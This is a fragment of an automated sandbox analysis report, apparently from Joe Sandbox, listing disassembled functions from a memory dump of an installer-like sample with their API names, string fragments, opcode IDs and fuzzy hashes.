                                                                                                                • Instruction Fuzzy Hash: 60218F70901619FFDF10CEA58D40DEF7A6DFF817A8F20C226B52472A90D6718D94D7A1
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9B86F1
                                                                                                                  • Part of subcall function 6C9C7173: __EH_prolog.LIBCMT ref: 6C9C7178
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9B88F9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: IJ$WIJ$J
                                                                                                                • API String ID: 3519838083-740443243
                                                                                                                • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                                                                                • Instruction ID: 2dac994a7204faa35c084c5efab7dc5d703d170901e56c5fbe8b06aeedb94cb3
                                                                                                                • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                                                                                • Instruction Fuzzy Hash: FD71B530900295EFDB18DF94C484BEEB7F5BF28308F1084AAD8556BB51CB74EA49CB95
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6CA01853
                                                                                                                  • Part of subcall function 6CA015DF: __EH_prolog.LIBCMT ref: 6CA015E4
                                                                                                                  • Part of subcall function 6CA01943: __EH_prolog.LIBCMT ref: 6CA01948
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: ((K$<(K$L(K$\(K
                                                                                                                • API String ID: 3519838083-3238140439
                                                                                                                • Opcode ID: cede27c3a22cca09b7bd7d03a45c990e4592a35e63268caaaf0da1c0b765a472
                                                                                                                • Instruction ID: d0212e2d75ef7def335ba0e47a9ae9626d107e660bc5fad1c8ef82d3b113c92d
                                                                                                                • Opcode Fuzzy Hash: cede27c3a22cca09b7bd7d03a45c990e4592a35e63268caaaf0da1c0b765a472
                                                                                                                • Instruction Fuzzy Hash: 272148B0901B408EC724DF6AD5446DAFBF4AF64308F108A1FC09687B50DBB4AA48CB65
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9CC41D
                                                                                                                  • Part of subcall function 6C9CCE40: __EH_prolog.LIBCMT ref: 6C9CCE45
                                                                                                                  • Part of subcall function 6C9CC8EB: __EH_prolog.LIBCMT ref: 6C9CC8F0
                                                                                                                  • Part of subcall function 6C9CC593: __EH_prolog.LIBCMT ref: 6C9CC598
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: &qB$0aJ$A0$XqB
                                                                                                                • API String ID: 3519838083-1326096578
                                                                                                                • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                                                                                • Instruction ID: 8c8862c4447b73464311a969bdd1e3e5cad505d8cd3835fbe688307d608a0c88
                                                                                                                • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                                                                                • Instruction Fuzzy Hash: 86217C71E01298EECB09DBE4D9819EDBBB4AF35308F20406ED81667781DB749E0DCB12
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: J$0J$DJ$`J
                                                                                                                • API String ID: 3519838083-2453737217
                                                                                                                • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                                                                                                • Instruction ID: c5c169e779fd83da71404344c04e29f51935361a6953369b743ee8e7effd93d5
                                                                                                                • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                                                                                                • Instruction Fuzzy Hash: 6811B0B0900BA4CEC7249F5AC55419AFBE4BFB5708B10C91FC4A687B50C7F8A549CB59
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $!$@
                                                                                                                • API String ID: 3519838083-2517134481
                                                                                                                • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                                                                                • Instruction ID: c7e944bc7e28431912e5c3fc46ad180a227bd8f59ecc584359d86abfa2b55f10
                                                                                                                • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                                                                                • Instruction Fuzzy Hash: D7129E70E0124ADFCB05CFA4C590AEDBBB5BF19308F148069E865ABB55D770E946CF90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog__aulldiv
                                                                                                                • String ID: $SJ
                                                                                                                • API String ID: 4125985754-3948962906
                                                                                                                • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                                                                                • Instruction ID: d775999a116d20950daacec84a439fd693ae7ce425aa370cf21535b90a0ff9e9
                                                                                                                • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                                                                                • Instruction Fuzzy Hash: 5CB15CB1E00349DFCB14CF99C9909AEBBB5BF58314F20852ED419A7B50D730EA85CB92
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $CK$CK
                                                                                                                • API String ID: 3519838083-2957773085
                                                                                                                • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                                                                                                • Instruction ID: bc32c1df28996c377513a5fce8bd54f999922b6c04bc6279136ad42e606f522c
                                                                                                                • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                                                                                                • Instruction Fuzzy Hash: EF218E71F012458BCB14DFA985811FEF7B6AB94304F544A2AC422A3A91C774CA468EA3
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: 0$LrJ$x
                                                                                                                • API String ID: 3519838083-658305261
                                                                                                                • Opcode ID: 95611479d40a215ec944db407e0a8f4bd880271165c87792ba86edb23d6a866c
                                                                                                                • Instruction ID: bf63898538f2ed65e86d7ae797e691f111d941bb5bbbe5ffca478644a39581bc
                                                                                                                • Opcode Fuzzy Hash: 95611479d40a215ec944db407e0a8f4bd880271165c87792ba86edb23d6a866c
                                                                                                                • Instruction Fuzzy Hash: 3821AC32D111199BCF04CBD8C991AEDB7B9EF68308F21016AE401B3740DB75EE09CBA1
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9D2ECC
                                                                                                                  • Part of subcall function 6C9BD58A: __EH_prolog.LIBCMT ref: 6C9BD58F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: :hJ$dJ$xJ
                                                                                                                • API String ID: 3519838083-2437443688
                                                                                                                • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                                                                                • Instruction ID: 9050f7703b6dcc9b2b56380911970335c5df9c5a3e4d3e3b85cb8f9546b8c1a2
                                                                                                                • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                                                                                • Instruction Fuzzy Hash: 5E21DAB0811B40CFC764CF6AC14429ABBF4BF29708B40C95EC4AA97B11D7B4A609CF59
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: <J$DJ$HJ$TJ$]
                                                                                                                • API String ID: 0-686860805
                                                                                                                • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                                                                                                • Instruction ID: 37ffe44c957ffea569322aba64a914cb756644e82ee2926af572b4ed4194ec07
                                                                                                                • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                                                                                                • Instruction Fuzzy Hash: 8341B470D01289AFCF14DBE1D4908EEB778AF3130CB51816AD06227E50EB31E64ACB57
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldiv
                                                                                                                • String ID:
                                                                                                                • API String ID: 3732870572-0
                                                                                                                • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                                                                                                • Instruction ID: 0e20940e51a7ef5fc38e745918f2627eef1f39989d55181c8a159fbfcececfa2
                                                                                                                • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                                                                                                • Instruction Fuzzy Hash: 4A11C376300244BFEB244AA5DD80EBFBBBDEBD5704F10881DB15156A50C671AC488762
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9AC077
                                                                                                                  • Part of subcall function 6C9ABFF5: __EH_prolog.LIBCMT ref: 6C9ABFFA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: :$\
                                                                                                                • API String ID: 3519838083-1166558509
                                                                                                                • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                                                                                                • Instruction ID: 6bdea3ff1e1746a8c6a2c34adfedc0ec9968b5d85aad1e45be1c6c6832b6ccb6
                                                                                                                • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                                                                                                • Instruction Fuzzy Hash: B2E1EF309042499ECF15EFE8C890BEDBBB5BF2531CF104119E8516BA90DB72EA4BCB55
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: x'K$|'K
                                                                                                                • API String ID: 3519838083-1041342148
                                                                                                                • Opcode ID: a25bbfd597e839604be9dc74c608115d2298b3d137bba62e84176c22df84cc64
                                                                                                                • Instruction ID: ee5a7a730b4ef1ade66303654f89e7cf1dce31a8d8744f1a1aea648cda8edcf6
                                                                                                                • Opcode Fuzzy Hash: a25bbfd597e839604be9dc74c608115d2298b3d137bba62e84176c22df84cc64
                                                                                                                • Instruction Fuzzy Hash: CCD14C30B04745AACB21CFA0E490AFEB775BF2138CF24461ED16663E90D765E9CAC711
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: @$hfJ
                                                                                                                • API String ID: 3519838083-1391159562
                                                                                                                • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                                                                                                • Instruction ID: a5675785b1225ef3ad451509a0396422441cc898f68f567fa2b4766601de4ee8
                                                                                                                • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                                                                                                • Instruction Fuzzy Hash: 3D913671910609DFCB10DFA9C8809DEBBF4BF29318F50851EE456B7A90D770EA48CB20
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9C6C5D
                                                                                                                  • Part of subcall function 6C9C561A: __EH_prolog.LIBCMT ref: 6C9C561F
                                                                                                                  • Part of subcall function 6C9C5A2E: __EH_prolog.LIBCMT ref: 6C9C5A33
                                                                                                                  • Part of subcall function 6C9C6EA5: __EH_prolog.LIBCMT ref: 6C9C6EAA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: WZJ
                                                                                                                • API String ID: 3519838083-1089469559
                                                                                                                • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                                                                                • Instruction ID: 11310ceb26e00f43a8896d5b7a555a456327ac00d264907c4ebfaadd79b2ff1d
                                                                                                                • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                                                                                • Instruction Fuzzy Hash: 7E814C31E00159DFCF15DFA4D990AEDBBB4AF29318F10409AE416B7791DB30AE49CB62
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog__aullrem
                                                                                                                • String ID: d%K
                                                                                                                • API String ID: 3415659256-3110269457
                                                                                                                • Opcode ID: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                                                                                                                • Instruction ID: 34a33d0f10f73edd72aded0e44243528dcc5c0c7ffc0c18868e4ba8a9a2f3fe8
                                                                                                                • Opcode Fuzzy Hash: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                                                                                                                • Instruction Fuzzy Hash: 6C61F531A002099FDF49CF56C5807EEB7F9AF5631CF24809AD864AF641C771D906CB55
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: CK$CK
                                                                                                                • API String ID: 3519838083-2096518401
                                                                                                                • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                                                                                                • Instruction ID: c9d95e0a8c73b152e696cecf22d339659815bd73d27be483f2b332e053862525
                                                                                                                • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                                                                                                • Instruction Fuzzy Hash: 0A51A275A003059FDB04CFA4C9C0BEEB3B9FF89718F148519D921ABA41D774E94A8F60
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: <dJ$Q
                                                                                                                • API String ID: 3519838083-2252229148
                                                                                                                • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                                                                                                • Instruction ID: e3e45dc81e7f0a450247fc3838e9aedfa879b079a5eb24a03c4e98c512f9c8d7
                                                                                                                • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                                                                                                • Instruction Fuzzy Hash: BA51CE70A04259EFCF00CFD8C8818EDB7B5BF59308F10852EE512ABA50D730DA5ACB92
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $D^J
                                                                                                                • API String ID: 3519838083-3977321784
                                                                                                                • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                                                                                                • Instruction ID: 0a20db9edc3c8b34181d66d70259b6d97ce3ea1c987c65ebaacb7c24d0db83ed
                                                                                                                • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                                                                                                • Instruction Fuzzy Hash: 24417A21B045907EDB22AF68C4907ECBBA99F3730CF168158C4D607E85DB64D98BC393
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: 8)L$8)L
                                                                                                                • API String ID: 3519838083-2235878380
                                                                                                                • Opcode ID: 1ee38908214ddba89c01b11f8f662c4b80f228d5f64c7dd9e77453d2deb43dcf
                                                                                                                • Instruction ID: 5ac3a585f861669fed7b16c5175820a9f349dcc3ed8e073de7fe64a9f71cfbf3
                                                                                                                • Opcode Fuzzy Hash: 1ee38908214ddba89c01b11f8f662c4b80f228d5f64c7dd9e77453d2deb43dcf
                                                                                                                • Instruction Fuzzy Hash: 6051DF31601A00CFC7158FB4D890BEABBF1FF95314F51846ED19AA7A60CB31B889CB84
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: qJ$#
                                                                                                                • API String ID: 3519838083-4209149730
                                                                                                                • Opcode ID: e1f34668789bc69a62d5b524bab96a8de5a2ccca07942ae6dd88fce0d8712790
                                                                                                                • Instruction ID: 2f588e89e536bb68639cf403e3cd0ef5101956955e80a9f6bc96c422336233d1
                                                                                                                • Opcode Fuzzy Hash: e1f34668789bc69a62d5b524bab96a8de5a2ccca07942ae6dd88fce0d8712790
                                                                                                                • Instruction Fuzzy Hash: 68515935A00649DFCB00DFA8C5509DDB7B9BF29318F168159E811BBB51CB34FA19CB61
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: PdJ$Q
                                                                                                                • API String ID: 3519838083-3674001488
                                                                                                                • Opcode ID: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                                                                                                                • Instruction ID: 88b5c54b5f134ac210e09b740e4ecbd1811af44b0814d2dd07a58bf59e09cabc
                                                                                                                • Opcode Fuzzy Hash: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                                                                                                                • Instruction Fuzzy Hash: 89419E71E00245DBCB10DFA9C491AEDB3B9FF49318B10812AE926A7A50C330DA55CBE3
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
